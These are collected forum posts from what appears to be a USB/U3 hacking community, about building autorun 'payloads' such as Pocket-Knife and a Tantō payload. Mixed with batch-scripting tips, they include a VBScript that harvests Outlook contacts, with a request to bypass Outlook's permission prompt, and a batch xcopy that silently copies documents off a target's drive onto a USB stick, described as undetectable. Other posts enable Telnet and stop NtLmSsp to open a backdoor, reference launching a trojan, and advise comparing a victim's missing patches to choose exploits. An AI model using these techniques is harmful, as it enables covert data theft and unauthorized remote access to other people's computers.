[Scratching on Outlook mailing list?]

May be this was a fool question?

No one have tried it?

Any other way to extract the contents of the contacts lists to a file?

Any suggestion?

[U3 Incident Response Payload]

We have to appoint DingleBerries the official digger!

[USB Pocket-Knife Development]

Since Leapos is not replying he might come back he might not, but untill then I think I'll carry the torch. DMilton if you would be so kind to help, msg me on MSN: Alex@normalms.com. So far I'm almost done some additions to it.

I think the project must be continued and If alexthedrifter carries the torch I'll be glad of helping a bit with cleaning code, digging for some other interesting things and with other community contributions or ideas.

But it must be in other post and I have a further question, is anybody else interested in working on it?

[How many icons are on your Desktop?]

I've got 155 on my desktop. 10 rows of 15 + 5 ... and I still have room for 160 more. 21 rows of 15 possible. /me <3's 16x12 resolution

Hahahahaha!

In your case, the answer of the topic would be: How many icons can room you?

[U3 Incident Response Payload]

Also the whole idea of this project is not to be sneaky about hidding the cmd box, just enjoy it for what it is. ;)

I agree that in forensic works, the last you want to see is nothing, there's no sense in hidding the cmd box. This payload was made by Tcstool originaly in forensis works, I agree it can be used for other purposes as grabbing sensible info from a pc, but...

Are you already dumping the Attached USB logs? Never know if the machine was owned by a U3 hacker..

PDF FILE WARNING

I saw the white papper an the info looks great! You can extract not only the serial number of all attached USB, but the last date it was connected and more... For forensic matters I think is a great implementation. If you want some help in this, I'll be ready on trying to do my best with it.

[USB Pocket-Knife Development]

I think we can improve the payload a bit more... But I'll wait for Leapo's taking the torch a few time more. Theese days are complicated for someone that is studiying...

If he pass the torch, I'll be very glad to continue it with some of the community support. If he doesn't, I'll be very glad to help in the progress and improve of it. Both cases, this project will continue....

[How many icons are on your Desktop?]

I can't believe it! There's about 2 Tons and a half of icons in my 3 desktops, the most of them are simply txt files with very long names... It's time to clean it a bit, If you want to help me, no worry...

[executable in a jpg]

You can learn and read by typing (for example) BINDER JOINER HACK into google. As far as I know, you can do it something like this but it results in executing an exe and launching an jpg instead reverse. But if the program you want to call is a virus or if it's virus detectable, it'll be detected anyway.

[wiki page down]

Switchblade Wiki works for me! Try again...

[USB U3 drives?]

Wow!! I get mine 8Gb per 16€ at Media Market!

[USB U3 drives?]

All U3 drives work for U3 Hacking, Sandisk, Memorex, etc...

:EDIT

I found my new U3 Sandisk 8Gb a week ago but It took some searching work...

Ebay is a good option for it.

[Launching Command Prompt]

You can enable the Windows Scripting Host too by executing the noscript.exe

But there's one thing I don't understand... The WSH doesn't affect running of batches

[Need .bat file help]

Impressive voodoo.

:P

I was really wondering if I could get the 'date' and 'time' variables to be able to be called from the 'yourbatch.bat' instead of adding to the vbs.

Haven't tried yet, but in 'yourbatch.bat' I'll put something like...

set "date=%date%"

set "time=%time%"

This would let me use 'anotherbatch.bat' to use the date and time variables...

call 'yourbatch.bat'

echo %date%

echo %time%

Get what I mean? Anyway, thanks for all the info! Very useful.

You doesn't need to define the variables twice, if you CALL ANOTHERBATCH.BAT from yourbatch.bat, the variables given by the vbs will work perfectly. It's because when you're calling a batch program from other, all the defined variables exists.

But if you deffinitely want not to use a vbs launcher to give the variables to the batch, you can aply the batching way I show you to format the date and time.

[USB Pocket-Knife Development]

How would i test the updates to see if they are vulnerable?

You must have a proof system with all updates available installed. Then see the differences between your updates and the updates extracted from the victim's pc, then you can exploit the non-installed patches as alexthedrifter says... googleing.

[Need .bat file help]

I caught the missing parenthesis when I was looking at the code, which was cool because I don't know vb.

Yet another thing I learned...I need to run the vb script. Lol. I was just running the batch file; no wonder it didn't work!

Do you know of a way to get it so that the date and time variables are useable to all my batch files? Or even a way to do it from within a batch file?

You can use the same vbs with each batch file you need to. There's two ways to do it, one is by executing one instance of the vbs per file... See

strPath = "YOURBATCH.BAT"
objShell.Run strPath, 1, False

The run command doesn't control the results of the running app, in this case, YOURBATCH.BAT.

But if you are attempting to run more batches in a time, you can add each batch from the same script and control their execution by managing the boolean value of the run method, with "True" the program will wait until the finishing of the batch, and with "False" it doesn't wait for finish of the batch, then the program will continue with next line of code.

Example:

Prog1 = "YOURBATCH.BAT" 'This is in the same folder as the vbs
Prog2 = "C:\Windows\hiddenbatch.bat" 'For a batch in other folder
Prog3 = "%SYSTEMROOT%\SYSTEM32\my_personal_trojan.exe 'Using environment variables
objShell.Run Prog1, 1, False ' The batch "yourbatch.bat" is executed in a minimized way and the program doesn't wait
objShell.Run Prog2, 1, True ' The batch "hiddenbatch.bat" is executed and the program wait for the finishing of it
objShell.Run Prog3, 1, False

In all the yourbatch.bat, hiddenbatch.bat or my_personal_trojan.exe, the Date and Time variables can be called from the batch.

If you want to know more on this stuff, see Microsoft Windows 2000 Scripting Guide

For the subject of this post, see This

<_< But if you want, you can format dates in a batch way... If you use in your batch some like this in an formated date as DD/MM/YYYY:

set DateToFile=%date:~6,4%-%date:~3,2%-%date:~0,2%
\stext %computername%[%DateToFile%].txt

As see, you can use %DateToFile% variable for using in your program, it will gives the Date formatted to YYY-MM-DD...

Now you can play with it to do the same with the %TIME% system enviroment variable or simply use SET /? from command line to see examples on how using variables and how deffining them. ;)

[Scratching on Outlook mailing list?]

It's not a new or brilliant idea, but I've been working a bit in extracting the contacts list from outlook address book.

This implementation made simply to any payload, would be able to extract the contact list to a plain text file.

Set fso = CreateObject("Scripting.FileSystemObject") 
set outlook=WScript.CreateObject("Outlook.Application") 
if Not err=0 then 
msgbox "Outlook is not available."
else
set mapi=outlook.GetNameSpace("MAPI") 
set MSOfile=fso.CreateTextFile("outlook-contacts.txt")
for ctrentries=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrentries) 
    x=1
    for countEntries=1 to n.AddressEntries.Count 
        contact=n.AddressEntries(x)
        MSOfile.WriteLine contact
        x=x+1 
    next 
next
end if

Of course, the err check is only for testing purposes. ;)

The problem is the message box of (almost for Outlook 2003) asking for permission for reading the contents of the pst file.

Any ideas on how to bypass the message box, some fix to the code or idea?

[Need .bat file help]

DMilton,

I can't get your vbs to work.

See for the code in line 1 of the vbs:

Set objShell = CreateObject("Wscript.Shell"

must be (also edited in previous post):

Set objShell = CreateObject("Wscript.Shell")

I have tested it and works ok (almost in WXP)

Maybe it's just that I'm on Vista, but it gives me the regular date and time variables.

I have 'yourbatch.bat' set to 'vars.cmd' and then in there it makes a folder calling the variables '%date%-%time%'.

If you get the variables, you can do whatever you want with them, calling them, batching them, etc.

A proof of concept on how it works (maybe for your mkdir it can be usefull, I have batched the next. Called yourbatch.bat (place it in the same folder as vbs), executethe vbs and it will call the yourbatch.bat file that will create a plain txt containing the results of vars given. Also it creates a new folder with the mentioned structure.

::yourbatch.bat
echo off
echo PROOF OF CONCEPT >proofdatetime.txt
echo var Date: %Date% >>proofdatetime.txt
echo var Time: %Time% >>proofdatetime.txt
echo mkdirectory: %computername%[%Date%-%Time%].txt>>pruebadate.txt
mkdir %computername%[%Date%-%Time%]

P.S. I also attempted to call 'vars.cmd' to see if that works too.

I want all the variables set in the 'vars.cmd' and then have all my batch files call 'vars.cmd' (looks neater and more effeicent)

You can do what you want with the variables. But I think the problem was solved with the mentioned code change.

[USB Pocket-Knife Development]

Im kind of a n00b and I didn't read all the threads so someone might have already asked this but is it possible for there to be a metasploit module in Pocket Knife? like, it could get the system info analyze it and come up with a list of possible exploits. Then u could exploit that computer when u get home. pls reply if this would be possible. Im not much of a programmer. I hardly know C++ so i might not be of much help.

Pocket knife extracts a list of updates of the system, you can test them at home and search for any vulnerability.

[U3 Incident Response Payload]

That's not a bad idea. I have a nice VBScript for this, but it occasionally will hang up on certain systems, so I'm working the kinks out.

I think it's a good idea too.

Do you know why it hangs up? What kind of systems it hangs up? If you want us to have a look to the piece of the VBScript, there'll be a good way to debug it by posting it or PM it, as you like.

[Simple goal,simple task ?]

There's no mistake. It's a piece from pocketknife and the only you have to do is defining the path you want to copy the files to.

Previous to creating the path %computername%\Slurp_Data\Desktop, you must create the ..\..\Documents folder, the \logfiles folder, the %computername% folder, the Slurp_Data folder...

Use one mkdir for each folder...

mkdir ..\..\Documents
mkdir ..\..\Documents\logfiles
mkdir ..\..\Documents\logfiles\%computername%
mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data
mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop
xcopy "C:\*.doc" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\" /s /c /q /r /h /y

[Simple goal,simple task ?]

Hey guys,these usb hacks are awsome.I have a simple task that i want to perform,I just want when i insert my usb stick to a computer,to search for specific type of files in the computer's hard drive and copy them to the usb,just that.Is something like this possible ? This kind of task will run udetected or will it trigger an alarm ? Thanks in advance.

You can search from specific type of files. The task is undetectable and you can find the solution reading the forum...

The filtering and copying can be done with just a batch file. But, you will only be able to do it in one/two directories. If this is black/grey hat, you are gonna need something like nircmd.

Not only able to do it in one/two directories... You can search from the entire hdd. nircmd is not needed (also you can use it), you can program it to make the work invisible, it not depends on what white/grey/black hat you do, but the way you program it and use it.

[Which one should I use?]

It depends on what do you want to do with your payload...

Amish and switchblade are both into Leapo's pocketnife. The better you can do is reading all the posts (pinned and newests) and look for the features you want.

Or better, you can modify the batches to do what you want.

Reading is the better solution. There's a lot of payloads you can execute from a non-U3.

[U3 Incident Response Payload]

As ever, I must to say it...

If you use an alternative installation language, you will get an error when trying to get "%ALLUSERSPROFILE%\Start Menu". But if you answer the registry key for it into HKEY_CLASSES_ROOT\CLSID\{4622AD11-FF23-11d0-8D34-00A0C90F2719} key value, you will find the exact and correct name of the "Start Menu" folder.

By example, as all of you know, I'm spanish and if I try to go to "%ALLUSERSPROFILE%\Start Menu" surely I'll can't because my Start Menu is named "Menú Inicio"...

It's possible to get in a variable the key of the Start Menú by using a variation of the reliable paths method described by me in the wiki... Or simply using vbs, of course!

Take a look if you want!

[DingleBerries Tantō Payload]

Then I will be testing the reason of not running almost it is in a desktop folder. The code seems to be ok, but... Hummm....

:Edit

Issues with Telnet:

By the way, there's some problems with the Telnet Service. The TlntSvr doesn't start with

sc config TlntSvr start= boot

but with

sc config TlntSvr start= auto

In other hand, Telnet Service is disabled with XP SP2 and we can launch it but is not available in XP Home. Then we must to check what OS we have to do the task or creating the entire service to use correctly (can do it by vbs).

Another thing to check for assure the service start is that TlntSvr is installed in the machine. For doing so, we can check for the correct branch in reg (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr) and operate accordingly with adding the service or not. It only will take a few lines to check it and if is not installed, we can add easily the needed keys to the registry with the batch or the vbs to operate the Service correctly.

Before of enabling the Telnet Service, I think is better option to stop the NtLmSsp Service (NT LM Security Support Provider) before enabling telnet.

net stop NtLmSsp

The final code would be...

tlntsvr /service
net stop NtLmSsp
sc config TlntSvr start= auto

But definitively, Telnet has problems in Windows XPSP2... What about using nc?

[DingleBerries Tantō Payload]

I think the whole bat to exe is whats doing it, so thats not going to work.. I just had a chance to try this out on a computer, and i was only able to get it to work it it was in a folder on the desk top.. so ill get some time and work on that part :/

I feel you didn't understand me (sorry, probabily it's my poor english). The question was if the payload.exe is a compilation of all the needed files (included keylogger and backdoor) or if payload.exe needs the batches, the 1.vbs and the other exes to go?